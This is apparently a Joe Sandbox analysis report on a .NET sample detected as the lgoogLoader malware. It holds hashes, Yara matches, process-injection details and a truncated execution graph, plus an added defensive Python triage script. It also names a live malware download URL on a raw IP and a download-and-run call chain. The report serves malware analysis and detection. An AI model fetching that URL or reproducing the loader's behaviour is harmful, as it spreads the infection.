    • Source: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd, Detection: 0%, Scanner: URL Reputation, Label: safe
    • Source: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t, Detection: 0%, Scanner: URL Reputation, Label: safe
    • Source: https://sectigo.com/CPS0, Detection: 0%, Scanner: URL Reputation, Label: safe
    • Source: http://ocsp.sectigo.com0, Detection: 0%, Scanner: URL Reputation, Label: safe
    • Source: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#, Detection: 0%, Scanner: URL Reputation, Label: safe
    • Source: https://www.sysinternals.com0, Detection: 0%, Scanner: URL Reputation, Label: safe
    • Source: http://109.206.241.33/files/1un.config.CfgEncFile, Detection: 17%, Scanner: Virustotal
    • Source: http://109.206.241.33/files/1un.config.CfgEncFile, Detection: 100%, Scanner: Avira URL Cloud, Label: malware
    • Source: http://109.206.241.33/files/1un.config.CfgEncFileMZ, Detection: 100%, Scanner: Avira URL Cloud, Label: malware
    No contacted domains info
    • Name: http://109.206.241.33/files/1un.config.CfgEncFile, Source: AddInProcess32.exe, Malicious: false, Antivirus Detection: 17% (Virustotal); Avira URL Cloud: malware, Reputation: unknown
    • Name: http://www.sysinternals.com, Source: AddInProcess32.exe, Malicious: false, Reputation: high
    • Name: http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmd, Source: AddInProcess32.exe, 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
    • Name: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t, Source: file.exe, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
    • Name: https://sectigo.com/CPS0, Source: file.exe, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
    • Name: http://ocsp.sectigo.com0, Source: file.exe, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
    • Name: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#, Source: file.exe, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
    • Name: https://www.sysinternals.com0, Source: ?????.sys.0.dr, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
    • Name: http://109.206.241.33/files/1un.config.CfgEncFileMZ, Source: AddInProcess32.exe, 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp; AddInProcess32.exe, 00000007.00000002.392608147.0000000002B40000.00000040.00001000.00020000.00000000.sdmp, Malicious: false, Antivirus Detection: Avira URL Cloud: malware, Reputation: unknown
    No contacted IP infos
      Joe Sandbox Version:37.1.0 Beryl
      Analysis ID:862324
      Start date and time:2023-05-09 17:28:16 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 32s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes:8
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample file name:file.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@15/2@0/0
      EGA Information:
      • Successful, ratio: 50%
      HDC Information:
      • Successful, ratio: 59.8% (good quality ratio 55.9%)
      • Quality average: 75.4%
      • Quality standard deviation: 30.2%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 9
      • Number of non-executed functions: 42
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Stop behavior analysis, all processes terminated
      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
      • Not all processes were analyzed, report is missing behavior information
      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
      No simulations
      No context
      Context for C:\Users\user\AppData\Local\Temp\?????.sys (matches in other Joe Sandbox analyses):
      • Associated Sample Name: Ref_PO#29968.exe, Detection: malicious, Threat Name: Unknown
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: HSCANNER.exe, Detection: malicious, Threat Name: FormBook
      • Associated Sample Name: HSBC_Bank_MT_103_Transfer_Copy_PDF.exe, Detection: malicious, Threat Name: AgentTesla
      • Associated Sample Name: Weekly_stock_list_0805.exe, Detection: malicious, Threat Name: AgentTesla
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: fBXNicB12R.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: a.exe, Detection: malicious, Threat Name: Amadey, AveMaria, Nitol, RedLine, Remcos, SmokeLoader, UACMe
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: m6JO0XiaWy.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: O8GyuZeT3P.exe, Detection: malicious, Threat Name: Vidar
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: nMIdIHOO7E.exe, Detection: malicious, Threat Name: Amadey, RedLine
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
      • Associated Sample Name: Narud#U017eba_za_26.04.2023..exe, Detection: malicious, Threat Name: FormBook
      • Associated Sample Name: file.exe, Detection: malicious, Threat Name: lgoogLoader
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1461
                                              Entropy (8bit):5.375805902953795
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhgLE4qXKIE4TKD1KoZAE4KKPaE4j:MxHKn1qHGiD0HKeGiYHKGD8AogLHitHa
                                              MD5:FC337EAC93C651C01D02B16E6905B397
                                              SHA1:08320670A665B3FC68812A0E1B318EE7CBCE5FC7
                                              SHA-256:695A51EE0DEB584A229313C044E5C00B77DF6DD53CCF0059E9B59729F425BA9C
                                              SHA-512:DCE9712EBCCAC70000AD03055531EA9B3ED32C8017AEB0C40BDCE823C04DD3821B3C204B95AEDAF34A1C51FCCDE50A5F5C891686540E951B05D4BE2EE5A9BD6C
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):36208
                                              Entropy (8bit):6.284053631838433
                                              Encrypted:false
                                              SSDEEP:768:tKCM0IWRhm8LiES4cT4iZ923OMqUD6Q4KICJw4:t7/Vhzb3pL4GJw4
                                              MD5:97E3A44EC4AE58C8CC38EEFC613E950E
                                              SHA1:BC47E15537FA7C32DFEFD23168D7E1741F8477ED
                                              SHA-256:440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
                                              SHA-512:8EF7FC489B6FFED9EC14746E526AE87F44C39D5EAFFF0D4C3BFA0B3F0D28450F76D1066F446C766F4C9A20842A7F084FE4A9F94659D5487EA88959FCCB2A96EB
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                               • Antivirus: Virustotal, Detection: 1%
                                               Joe Sandbox View:
                                               • Filename: Ref_PO#29968.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: HSCANNER.exe, Detection: malicious
                                               • Filename: HSBC_Bank_MT_103_Transfer_Copy_PDF.exe, Detection: malicious
                                               • Filename: Weekly_stock_list_0805.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: fBXNicB12R.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: a.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: m6JO0XiaWy.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: O8GyuZeT3P.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: nMIdIHOO7E.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               • Filename: Narud#U017eba_za_26.04.2023..exe, Detection: malicious
                                               • Filename: file.exe, Detection: malicious
                                               Preview: MZ/PE32+ image with DOS stub; sections present in the header: .text, .rdata, .data, .pdata, PAGE, INIT, .rsrc, .reloc (raw binary dump omitted)
                                              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):4.25642365152462
                                              TrID:
                                              • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                              • Win64 Executable GUI (202006/5) 46.43%
                                              • Win64 Executable (generic) (12005/4) 2.76%
                                              • Generic Win/DOS Executable (2004/3) 0.46%
                                              • DOS Executable Generic (2002/1) 0.46%
                                              File name:file.exe
                                              File size:1338216
                                              MD5:851dfeb9035473532d796a9b41608b3c
                                              SHA1:beca84bb1ffd0146f8e5b87a01b14b42e8d50e2b
                                              SHA256:5867c5321292565fa017f4e88b6c4894572d7fa557e9a0ddb1ced4362413b6b3
                                              SHA512:4768571679e045a2dbcb80ffe1dab9f97bc4c17ccb2cb2f2e8598e0afebaa7443b8ca027763cce7643def7321a63692b053ee5a9d17d0ac04a160ba8ed0f83f7
                                              SSDEEP:12288:GbnXLRzlUCodzOurH+pRCK4ZLnfbygqOpOFXZ4NdbEfEruuDavFUWY5A3IRQgnnt:GrtqRUZYSh8t7ejqQLeCYCBuQ1vr3c
                                              TLSH:ED5549343AFA502AB173EFA54AE479E6DA6FB7733B07641D109103864723A41EDC193E
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....EYd.........."...0.uG..r............ ....@...... ...............................O....`................................
                                              Icon Hash:00828e8e8686b000
                                              Entrypoint:0x400000
                                              Entrypoint Section:
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x6459450E [Mon May 8 18:53:02 2023 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:
                                              Signature Valid:false
                                              Signature Issuer:C=CN, CN=upwork Ltd
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 5/9/2023 4:24:15 PM 5/9/2024 4:24:15 PM
                                              Subject Chain
                                              • C=CN, CN=upwork Ltd
                                              Version:3
                                              Thumbprint MD5:A86456CED00CE864F111465433283811
                                              Thumbprint SHA-1:63D1D89606D2435239469D3297AE241286EFECF1
                                              Thumbprint SHA-256:B7685122944B6F0B2D1D9CE39052B0828E9DF559E202EC48CCAFA4ED02538262
                                              Serial:432AD609F49E1629E7D765061BCE3A61
                                              Instruction
                                              dec ebp
                                              pop edx
                                              nop
                                              add byte ptr [ebx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+eax], al
                                              add byte ptr [eax], al
                                               Data directories:
                                               • Name: IMAGE_DIRECTORY_ENTRY_EXPORT, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_IMPORT, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_RESOURCE, Virtual Address: 0x148000, Virtual Size: 0x872, Is in Section: .rsrc
                                               • Name: IMAGE_DIRECTORY_ENTRY_EXCEPTION, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_SECURITY, Virtual Address: 0x145400, Virtual Size: 0x1768
                                               • Name: IMAGE_DIRECTORY_ENTRY_BASERELOC, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_DEBUG, Virtual Address: 0x1466ec, Virtual Size: 0x1c, Is in Section: .text
                                               • Name: IMAGE_DIRECTORY_ENTRY_COPYRIGHT, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_GLOBALPTR, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_TLS, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_IAT, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, Virtual Address: 0x0, Virtual Size: 0x0
                                               • Name: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, Virtual Address: 0x2000, Virtual Size: 0x48, Is in Section: .text
                                               • Name: IMAGE_DIRECTORY_ENTRY_RESERVED, Virtual Address: 0x0, Virtual Size: 0x0
                                               Sections:
                                               • Name: .text, Virtual Address: 0x2000, Virtual Size: 0x144775, Raw Size: 0x144800, Xored PE: False, ZLIB Complexity: 0.46086527349768874, File Type: data, Entropy: 4.225065680038577, Characteristics: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                               • Name: .rsrc, Virtual Address: 0x148000, Virtual Size: 0x872, Raw Size: 0xa00, Xored PE: False, ZLIB Complexity: 0.3484375, File Type: data, Entropy: 3.5753513989958745, Characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                               Resources:
                                               • Name: RT_VERSION, RVA: 0x1480a0, Size: 0x5e8, Type: data
                                               • Name: RT_MANIFEST, RVA: 0x148688, Size: 0x1ea, Type: XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                              No network behavior found
                                              Target ID:0
                                              Start time:17:29:12
                                              Start date:09/05/2023
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\Desktop\file.exe
                                              Imagebase:0x1c5babf0000
                                              File size:1338216 bytes
                                              MD5 hash:851DFEB9035473532D796A9B41608B3C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Reputation:low

                                              Target ID:1
                                              Start time:17:29:49
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
                                              Imagebase:0xa0000
                                              File size:46688 bytes
                                              MD5 hash:2B40A449D6034F41771A460DADD53A60
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:2
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                                              Imagebase:0x7ff70b2d0000
                                              File size:128584 bytes
                                              MD5 hash:B00E9325AC7356A3F4864EAAAD48E13F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:3
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                              Imagebase:0x192514e0000
                                              File size:54888 bytes
                                              MD5 hash:7809A19AA8DA1A41F36B60B0664C4E20
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:4
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
                                              Imagebase:0x26a0fa80000
                                              File size:44640 bytes
                                              MD5 hash:59FCE79E9D81AB9E2ED4C3561205F5DF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:5
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                              Imagebase:0x201b9ef0000
                                              File size:24160 bytes
                                              MD5 hash:48FD4DD682051712E3E7757C525DED71
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:6
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
                                              Imagebase:0x29622630000
                                              File size:44648 bytes
                                              MD5 hash:BF7E443F1E1FA88AD5A2A5EB44F42834
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:7
                                              Start time:17:29:50
                                              Start date:09/05/2023
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
                                              Imagebase:0x9b0000
                                              File size:42080 bytes
                                              MD5 hash:F2A47587431C466535F3C3D3427724BE
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                              • Rule: JoeSecurity_lGoogLoader, Description: Yara detected lgoogLoader, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
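
The three process blocks above are the part of this report a responder acts on, so the following added example (written for this page, not Joe Sandbox code) parses them into records, decodes the memory-region attributes encoded in the Yara "Source" dump name, and emits the findings that matter: .NET Framework utilities started with an empty command line, several of them in the same second, and a Yara hit inside committed private memory that is both writable and executable. The field layout assumed for the .sdmp name (target.run.sequence.base.protect.state.type.reserved) is inferred only from the shape of the name on this page and is an assumption; the protection, state and type constants are the standard winnt.h values. The embedded input is copied from the table above with the fields not needed here dropped.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Windows memory constants (winnt.h); PAGE_PROTECT is the subset needed here.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITE_EXEC = {0x40, 0x80}            # page protections that are both writable and executable
FRAMEWORK_DIR = "c:\\windows\\microsoft.net\\framework"

# Excerpt copied from the process table above; fields not needed here were dropped.
REPORT_EXCERPT = r"""
Target ID:5
Start time:17:29:50
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Target ID:6
Start time:17:29:50
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe

Target ID:7
Start time:17:29:50
Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
Yara matches:
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
• Rule: JoeSecurity_lGoogLoader, Description: Yara detected lgoogLoader, Source: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
"""

@dataclass
class Proc:
    target_id: int
    start_time: str = ""
    path: str = ""
    commandline: str = ""
    yara: list = field(default_factory=list)   # (rule name, memory-dump file name)

def parse_targets(text):
    """Turn the report's 'Label:value' process blocks into Proc records."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        key, _, value = line.partition(":")      # split on the first colon only (paths contain one)
        if key == "Target ID":
            cur = Proc(int(value))
            procs.append(cur)
        elif cur is None:
            continue
        elif key == "Start time":
            cur.start_time = value.strip()
        elif key == "Path":
            cur.path = value.strip()
        elif key == "Commandline":
            cur.commandline = value.strip()
        elif line.startswith("• Rule:"):
            m = re.search(r"Rule: ([^,]+),.*?Source: ([^\s,]+)", line)
            if m:
                cur.yara.append((m.group(1), m.group(2)))
    return procs

def decode_sdmp(name):
    """Decode a memory-dump name. ASSUMED layout, inferred only from the name's shape:
    target.run.sequence.base.protect.state.type.reserved.sdmp (base/protect/state/type in hex)."""
    parts = name[:-5].split(".") if name.endswith(".sdmp") else name.split(".")
    if len(parts) != 8:
        raise ValueError("unexpected sdmp name: " + name)
    base, protect, state, mtype = (int(x, 16) for x in parts[3:7])
    return {"target": int(parts[0]), "base": base, "protect_raw": protect,
            "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
            "state": MEM_STATE.get(state, hex(state)), "type": MEM_TYPE.get(mtype, hex(mtype))}

def triage(text):
    """Findings as (target_id, kind, detail); target 0 marks a cross-process finding."""
    findings, by_second = [], defaultdict(list)
    for p in parse_targets(text):
        by_second[p.start_time].append(p.target_id)
        exe = p.path.rsplit("\\", 1)[-1]
        cmd = p.commandline
        args = cmd[len(p.path):].strip() if cmd.lower().startswith(p.path.lower()) else cmd
        if p.path.lower().startswith(FRAMEWORK_DIR) and not args:
            findings.append((p.target_id, "no_args", f"{exe}: .NET Framework utility started "
                             "without arguments, a common process-hollowing host"))
        hits = {}
        for rule, src in p.yara:
            m = decode_sdmp(src)
            if (m["protect_raw"] & 0xFF) in WRITE_EXEC and m["type"] == "MEM_PRIVATE":
                hits.setdefault((m["base"], m["protect"]), []).append(rule)
        for (base, prot), rules in hits.items():
            findings.append((p.target_id, "rwx_yara", f"{', '.join(rules)} matched in {prot} "
                             f"MEM_PRIVATE memory at {base:#x} of {exe}: unpacked code, not a mapped image"))
    for second, ids in by_second.items():
        if len(ids) > 1:
            findings.append((0, "same_second", f"targets {ids} all started at {second}"))
    return findings
```

Running triage(REPORT_EXCERPT) yields three "no_args" findings (targets 5, 6, 7), one "rwx_yara" finding for target 7 at 0x1380000 (PAGE_EXECUTE_READWRITE, MEM_COMMIT, MEM_PRIVATE), and one "same_second" finding for 17:29:50. The decisive signal is the combination: a Microsoft-signed framework binary whose only executable memory outside its mapped image is a private RWX region carrying the loader's Yara signature.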

                                              Execution Graph

                                              Execution Coverage:5.5%
                                              Dynamic/Decrypted Code Coverage:24%
                                              Signature Coverage:12.8%
                                              Total number of Nodes:1311
                                              Total number of Limit Nodes:4
                                              execution_graph:interactive node/edge rendering; the flattened dump of node ids, addresses and API labels is not reproduced here. Call chains recoverable from it, by address region:
                                              • 0x401000-0x40cxxx (native code with a statically linked MSVC CRT): startup via GetStartupInfoA, GetProcessHeap/HeapAlloc/HeapFree and GetVersionExA; the __security_init_cookie pattern GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter; CRT housekeeping through TlsAlloc, TlsGetValue, GetModuleHandleA, GetProcAddress, InitializeCriticalSection, EnterCriticalSection/LeaveCriticalSection, DeleteCriticalSection, InterlockedIncrement/InterlockedDecrement, RtlUnwind, SetStdHandle, SetFilePointer, WriteFile, GetConsoleCP, GetConsoleMode, WideCharToMultiByte and CloseHandle; a Sleep retry loop inside the CRT allocator (__calloc_crt, __malloc_crt); VirtualAlloc reached repeatedly through the __lseeki64 helpers; and a small dialog application: DefWindowProcW, ChildWindowFromPoint, SetCursor, InvalidateRect, ShellExecuteW, EndDialog, PostQuitMessage, GetFileVersionInfoW/VerQueryValueW, SetDlgItemTextW, LoadCursorW, ShowWindow, GetDlgItem, GetSysColorBrush, GetSysColor, SetBkMode, SetTextColor, SelectObject, PrintDlgW, StartPage/EndPage/EndDoc, SendMessageW, SetWindowTextW.
                                              • 0x1380000 (the region carrying the Yara matches for Target ID 7): VirtualAlloc at 0x138020a and 0x1380700, LoadLibraryA in a loop at 0x1380683, then a transfer at 0x1380764 into code at 0x2b5145f.
                                              • 0x2b51000-0x2b53xxx: LoadLibraryA; GetSystemTimeAsFileTime; GetCurrentProcess/TerminateProcess; GetModuleHandleA, VirtualQuery, GetModuleFileNameW; CreateFileW, SetFileInformationByHandle, CloseHandle, GetTempPathW; GetProcessHeap/HeapAlloc; registry enumeration with RegOpenKeyExW, RegQueryInfoKeyW, RegEnumKeyW, StrCatW, RegQueryValueExA/RegQueryValueExW, RegCloseKey and lstrcpyA/lstrcatA string building; wsprintfW + CreateFileW followed by two DeviceIoControl calls, StrNCatA, CloseHandle and MultiByteToWideChar; six consecutive StrStrIW and five consecutive StrStrIA comparisons; EnumDisplayDevicesA with lstrcatA, StrStrA/StrStrIA and GetLastError; SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess; and a call whose label is truncated in the source ("IsProces").
                                              The dump is cut off in the source after node 7087.
2b5213b 7004->7087 7006 2b51207 7007 2b53c33 5 API calls 7006->7007 7008 2b51214 7007->7008 7008->6882 7009 2b510dd GetProcessHeap HeapAlloc 7010 2b51057 7009->7010 7010->7006 7010->7009 7011 2b52ac6 19 API calls 7010->7011 7012 2b52ac6 19 API calls 7010->7012 7014 2b51d9d 42 API calls 7010->7014 7016 2b5112a GetProcessHeap HeapFree 7010->7016 7018 2b522f0 40 API calls 7010->7018 7019 2b511ea 7010->7019 7022 2b512c0 GetProcessHeap HeapAlloc 7010->7022 7024 2b512f0 StrCatW 7010->7024 7026 2b51349 CreateProcessW CloseHandle CloseHandle Sleep 7010->7026 7102 2b53b3f 7010->7102 7013 2b51247 PathFileExistsW 7011->7013 7012->7010 7013->7010 7015 2b5125d DeleteFileW URLDownloadToFileW PathFileExistsW 7013->7015 7014->7010 7015->7010 7016->7010 7020 2b51184 GetProcessHeap HeapFree 7018->7020 7019->7006 7023 2b511f3 Sleep 7019->7023 7094 2b53a3d 7019->7094 7020->7010 7022->7010 7022->7024 7023->7006 7023->7019 7024->7010 7025 2b51302 StrCatW StrCatW 7024->7025 7025->7010 7026->7010 7028 2b529dc GetFileSize 7027->7028 7031 2b5140a 7027->7031 7029 2b529ed CloseHandle 7028->7029 7030 2b529f8 GetFileSize GetProcessHeap HeapAlloc ReadFile 7028->7030 7029->7031 7032 2b52a3c CloseHandle 7030->7032 7033 2b52a2a GetProcessHeap HeapFree 7030->7033 7031->6882 7031->6893 7032->7031 7033->7029 7035 2b52aff 7034->7035 7043 2b52c44 7034->7043 7038 